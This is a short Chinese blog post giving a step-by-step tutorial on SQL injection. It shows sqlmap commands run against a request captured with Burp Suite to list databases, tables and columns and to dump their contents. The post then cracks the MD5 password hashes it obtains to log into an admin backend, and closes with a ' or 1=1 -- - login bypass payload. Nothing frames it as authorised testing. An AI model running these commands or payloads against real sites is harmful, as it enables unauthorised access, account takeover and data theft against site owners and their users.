sqlmap工具的利用
sqlmap工具的利用
利用sqlmap工具进行SQLI
找到某个可以发起数据库请求页面,并确定该页面可以SQLI后,可以先用burpsuite抓 个request包
然后把包里的内容保存到文本里,例如SQLI.txt
sudo sqlmap -r SQLI.txt --dbs 发送request,执行注入
sudo sqlmap -r SQLI.txt --current-db 查看当前所在的数据库名称
sudo sqlmap -r SQLI.txt -D 'current db' --tables 查看当前数据中的table
sudo sqlmap -r SQLI.txt -D 'current db' -T 'choose tab' --columns 选择当前数据库中的table并查看column
sudo sqlmap -r SQLI.txt -D 'current db' -T 'choose tab' -C 'choose col1,choose col2' --dump 选择想要查看的column并显示出来
一番操作后便可以得到用户名及由md5加密的密码
将密码解密后便可以用其登录网站管理后台了
简单的SQL注入
在一些admin登录界面可以试试,like this:
输入:
Username:admin
Password:' or 1=1 -- -
即可登录
本文来自博客园,作者:野荷,转载请注明原文链接:https://www.cnblogs.com/jhinjax/p/17257996.html